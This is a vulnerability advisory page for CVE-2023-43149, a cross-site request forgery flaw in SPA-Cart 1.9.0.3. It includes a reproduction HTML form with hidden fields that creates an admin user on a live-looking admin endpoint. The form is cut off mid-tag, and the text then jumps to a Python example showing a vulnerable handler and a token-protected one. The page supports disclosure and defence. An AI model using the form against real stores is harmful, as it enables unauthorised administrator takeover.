CVE-2023-43149
Description
SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- (no CPE)
- (no CPE), range: =1.9.0.3
Patches
Vulnerability mechanics
Root cause
"The application lacks CSRF protection on the user creation endpoint."
Attack vector
A remote attacker can exploit this vulnerability by tricking an authenticated administrator into clicking a crafted HTML link or opening a malicious file [ref_id=1]. This action submits a POST request to the user creation endpoint, allowing the attacker to add a new administrator user with a specified role status [ref_id=1]. The vulnerability is present in SPA-Cart version 1.9.0.3.
Affected code
The vulnerability lies in the user creation functionality of SPA-Cart version 1.9.0.3, specifically the endpoint that handles adding new users, which accepts state-changing POST requests without any CSRF protection.
What the fix does
The advisory does not specify a patch or provide remediation guidance, so the exact fix is not detailed. To address this CSRF vulnerability, developers should implement anti-CSRF tokens or other appropriate measures to validate the origin of requests to sensitive endpoints.
Preconditions
- auth: The victim must be an authenticated administrator.
Reproduction
1 - Make a file with this code and save it as HTML ("Attack Delete All Account")
<html>
<body>
<form action="https://demo.spa-cart.com/admin/user/859" method="POST" enctype="multipart/form-data">
<input type="hidden" name="posted_data[firstname]" value="mal1" />
<input type="hidden" name="posted_data[lastname]" value="mal2" />
<input type="hidden" name="posted_data[phone]" value="156415641561" />
<input type="hidden" name="posted_data[email]" value="mal1@test.com" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="posted_data[usertype]" value="C" />
<input type="hidden" name="posted_data[roleid]" value="1" />
<input type="hidden" name="posted_data[status]" value="1" />
<input type="hidden" name="posted_data[address]" value="" />
<input type="hidden" name="posted_data[city]" value="" />
<input type="hidden" name="posted_data[state]" value="" />
<input type="hidden" name="posted_data[country]" value="AG" />
<input type="hidden" name="posted_data[zipcode]" value="05584" />
<input type="hidden" name="posted_data[pending_membershipid]"
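The "What the fix does" section above says the remedy is an anti-CSRF token or another check on where a request came from. The following is an added example, not SPA-Cart's code: a minimal Python model of an admin "create user" handler in its vulnerable shape and in a hardened shape (Origin/Referer check plus a per-session synchronizer token compared in constant time), with the forged form from the reproduction section traced through both. The session model, the trusted origin `https://shop.example`, the attacker origin and all function names are assumptions made for illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Added example (not SPA-Cart code). Models a "create user" handler without and
# with CSRF protection so the PoC form above can be traced through both.
# Names, the session model and the trusted origin are illustrative assumptions.

TRUSTED_ORIGIN = "https://shop.example"  # placeholder for the real site origin


@dataclass
class Session:
    user: str
    is_admin: bool
    # One unguessable token per session; a page on another origin cannot read it.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def hidden_token_field(session: Session) -> str:
    """The hidden input the legitimate admin page embeds in its own form."""
    return f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'


def create_user_unprotected(session, headers, form):
    """Vulnerable shape: any POST carrying the admin's session cookie is honoured."""
    if session is None or not session.is_admin:
        return 403, "admin session required"
    return 200, f"created {form['posted_data[email]']} roleid={form['posted_data[roleid]']}"


def _origin_is_cross_site(headers) -> bool:
    """True only when the browser told us the request came from another site."""
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False  # inconclusive; the token check still applies
    return not (origin == TRUSTED_ORIGIN or origin.startswith(TRUSTED_ORIGIN + "/"))


def create_user_protected(session, headers, form):
    """Hardened shape: origin check, then synchronizer token in constant time."""
    if session is None or not session.is_admin:
        return 403, "admin session required"
    if _origin_is_cross_site(headers):
        return 403, "cross-site origin rejected"
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session.csrf_token):
        return 403, "missing or invalid CSRF token"
    return 200, f"created {form['posted_data[email]']} roleid={form['posted_data[roleid]']}"


# Constructed sample traffic. The forged form mirrors the PoC fields: the
# victim's browser attaches the admin cookie automatically, but the attacker's
# page can neither read the session token nor suppress its own Origin.
ADMIN = Session(user="admin", is_admin=True)

FORGED_FORM = {
    "posted_data[email]": "mal1@test.com",
    "posted_data[usertype]": "C",
    "posted_data[roleid]": "1",
    "posted_data[status]": "1",
}
FORGED_HEADERS = {"Origin": "https://attacker.example"}  # constructed

LEGIT_FORM = {**FORGED_FORM, "posted_data[email]": "new.admin@shop.example",
              "csrf_token": ADMIN.csrf_token}
LEGIT_HEADERS = {"Origin": TRUSTED_ORIGIN}


def run_scenarios():
    """Outcome of each request under both handlers, keyed by scenario name."""
    return {
        "unprotected/forged": create_user_unprotected(ADMIN, FORGED_HEADERS, FORGED_FORM),
        "protected/forged": create_user_protected(ADMIN, FORGED_HEADERS, FORGED_FORM),
        "protected/forged-no-origin": create_user_protected(ADMIN, {}, FORGED_FORM),
        "protected/legit": create_user_protected(ADMIN, LEGIT_HEADERS, LEGIT_FORM),
    }


if __name__ == "__main__":
    for name, (status, msg) in run_scenarios().items():
        print(f"{name:28} -> {status} {msg}")
```

Two design points matter here. The token check is what actually closes the hole: the PoC form's `multipart/form-data` POST is a "simple" request that browsers send without a CORS preflight, so only a secret the attacker's page cannot read stops it. The Origin check is a cheap second layer; it fails closed only when a cross-site origin is explicitly present, and otherwise defers to the token rather than rejecting clients that send no Origin or Referer at all.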
Generated on Jun 6, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
News mentions
No linked articles in our index yet.